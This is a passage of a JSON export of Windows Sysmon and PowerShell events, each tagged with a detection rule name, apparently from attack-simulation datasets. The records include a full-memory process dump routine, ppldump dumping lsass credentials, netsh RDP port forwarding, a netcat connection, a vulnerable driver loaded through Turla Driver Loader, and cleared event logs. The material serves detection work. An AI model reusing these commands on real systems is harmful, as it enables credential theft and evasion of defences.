@($ProcessHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$ProcessId,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$FileStream.SafeFileHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$MiniDumpWithFullMemory,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero))\r\n\t\t\t \r\n\t\t$FileStream.Close()\r\n\t\t\r\n\t\tif (-not $Result)\r\n\t\t{\r\n\t\t\t$Exception = New-Object ComponentModel.Win32Exception\r\n\t\t\t$ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\r\n\t\t\t\r\n\t\t\t# Remove any partially written dump files. 
For example, a partial dump will be written\r\n\t\t\t# in the case when 32-bit PowerShell tries to dump a 64-bit process.\r\n\t\t\tRemove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\r\n\t\t\t\r\n\t\t\tthrow $ExceptionMessage\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\"Memdump complete!\"\r\n\t\t}\r\n\t\r\n}"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"4AA5EAE3-4F33-0001-3A2B-A64A334FD601"}},"EventID":4104,"EventRecordID":971,"Execution":{"#attributes":{"ProcessID":7008,"ThreadID":6488}},"Keywords":"0x0","Level":3,"Opcode":15,"Provider":{"#attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"}},"Security":{"#attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"}},"Task":2,"TimeCreated":{"#attributes":{"SystemTime":"2020-06-30T14:24:08.254605Z"}},"Version":1}}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"System","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":104,"EventRecordID":63220,"Execution":{"#attributes":{"ProcessID":264,"ThreadID":644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":{"#attributes":{"UserID":"S-1-5-21-308926384-506822093-3341789130-1106"}},"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-15T19:28:31.453647Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"BackupPath":"","Channel":"System","SubjectDomainName":"3B","SubjectUserName":"a-jbrown"}}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"ppldump.exe -p lsass.exe -o a.png","Company":"?","CurrentDirectory":"c:\\Users\\Public\\BYOV\\ZAM64\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC","Image":"C:\\Users\\Public\\BYOV\\ZAM64\\ppldump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-21D2-5E41-0000-002034770900","LogonId":"0x97734","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-27FE-5E41-0000-0010DD653800","ParentProcessId":4236,"ProcessGuid":"747F3D96-2B98-5E41-0000-00109C904700","ProcessId":5016,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 10:08:24.525"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":20012,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3456}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T10:08:24.535095Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"chost.exe 
payload.bin","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\evasion\\","Description":"?","FileVersion":"?","Hashes":"SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25","Image":"C:\\Users\\Public\\tools\\evasion\\chost.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"?","ParentCommandLine":"\"C:\\windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-001025004E3A","ParentProcessId":30572,"ProcessGuid":"00247C92-20BD-5EFE-0000-00106D029D3A","ProcessId":16900,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.612"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116720,"Execution":{"#attributes":{"ProcessID":5320,"ThreadID":6908}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-02T18:00:29.615842Z"}},"Version":5}}}},{"detection":["Conhost Parent Process Executions"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"notepad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Notepad","FileVersion":"10.0.18362.693 
(WinBuild.160101.0800)","Hashes":"SHA1=C401CD335BA6A3BDAF8799FDC09CDC0721F06015,MD5=06E6C0482562459ADB462CA9008262F8,SHA256=E5D90BEEB6F13F4613C3153DABBD1466F4A062B7252D931F37210907A7F914F7,IMPHASH=E2D17AC7541817AA681AE8FF7734AD89","Image":"C:\\Windows\\System32\\notepad.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"NOTEPAD.EXE","ParentCommandLine":"\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1","ParentImage":"C:\\Windows\\System32\\conhost.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-00105A024E3A","ParentProcessId":29168,"ProcessGuid":"00247C92-20BD-5EFE-0000-00105C059D3A","ProcessId":16788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.642"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116722,"Execution":{"#attributes":{"ProcessID":5320,"ThreadID":6908}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-02T18:00:29.650400Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"spooler.exe 
payload.bin","Company":"?","CurrentDirectory":"c:\\Users\\Public\\tools\\cinj\\","Description":"?","FileVersion":"?","Hashes":"SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4","Image":"C:\\Users\\Public\\tools\\cinj\\spooler.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1CE4-5EFE-0000-00208F9C0800","LogonId":"0x89c8f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1E44-5EFE-0000-001096443700","ParentProcessId":1140,"ProcessGuid":"747F3D96-1EA9-5EFE-0000-0010B1F13D00","ProcessId":6892,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-02 17:51:37.815"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":304593,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-02T17:51:37.819891Z"}},"Version":5}}}},{"detection":["Netsh Port Forwarding","Netsh RDP Port Forwarding"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-DC3E-5CE6-0000-00102BC97200","ParentProcessId":712,"ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 17:46:04.651"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1026,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:46:04.671625Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"1.2.3.5/3389","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\PortProxy\\v4tov4\\tcp\\1.2.3.4/8001","UtcTime":"2019-05-23 
17:46:05.022"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":1027,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:46:05.022129Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"nc.exe 127.0.0.1 1337","Company":"?","CurrentDirectory":"C:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-9DC3-5E75-0000-00205F930200","LogonId":"0x2935f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9E06-5E75-0000-00107D541000","ParentProcessId":6088,"ProcessGuid":"747F3D96-9F77-5E75-0000-0010D2E62000","ProcessId":3364,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 
05:00:39.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243567,"Execution":{"#attributes":{"ProcessID":2860,"ThreadID":3508}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T05:00:39.226538Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-9DBA-5E75-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9F77-5E75-0000-001090F32000","ParentProcessId":2416,"ProcessGuid":"747F3D96-9F7D-5E75-0000-00104E062100","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 
05:00:45.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243570,"Execution":{"#attributes":{"ProcessID":2860,"ThreadID":3508}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T05:00:45.087155Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\Start","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4859,"Execution":{"#attributes":{"ProcessID":984,"ThreadID":2352}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-26T04:01:42.625851Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\ImagePath","UtcTime":"2019-05-26 
04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4860,"Execution":{"#attributes":{"ProcessID":984,"ThreadID":2352}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-26T04:01:42.645880Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory","Suspect Svchost Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-8DBD-5CEA-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","ParentImage":"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe","ParentProcessGuid":"365ABB72-0FA6-5CEA-0000-0010FEC30A00","ParentProcessId":3884,"ProcessGuid":"365ABB72-0FA7-5CEA-0000-001064C60A00","ProcessId":3908,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-26 
04:01:43.557"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution":{"#attributes":{"ProcessID":984,"ThreadID":2352}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-26T04:01:43.567204Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Furutaka.exe dummy2.sys","Company":"UG North","CurrentDirectory":"c:\\Users\\Public\\BYOV\\TDL\\","Description":"Turla Driver Loader","FileVersion":"1.1.5.1904","Hashes":"SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-12FA-5E41-0000-0020171A0300","LogonId":"0x31a17","OriginalFileName":"Furutaka.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1363-5E41-0000-0010356F1500","ParentProcessId":8864,"ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"TurlaDriverLoader","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 
08:28:12.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":18762,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.856363Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-02-10 08:28:12.870","Image":"c:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\drivers\\VBoxDrv.sys","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":18763,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.876766Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 
08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18764,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.888628Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\\??\\C:\\Windows\\system32\\drivers\\VBoxDrv.sys","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\ImagePath","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18765,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.899736Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 
08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18767,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:13.091460Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"NT Kernel & System","FileVersion":"10.0.17763.973 (WinBuild.160101.0800)","Hashes":"SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ImageLoaded":"C:\\Windows\\System32\\ntoskrnl.exe","OriginalFileName":"ntkrnlmp.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"Microsoft® Windows® Operating System","RuleName":"Supicious image loaded - ntoskrnl","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-02-10 
08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":18769,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3888}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:13.147582Z"}},"Version":3}}}},{"detection":["(Built-in Logic) - Security audit log was 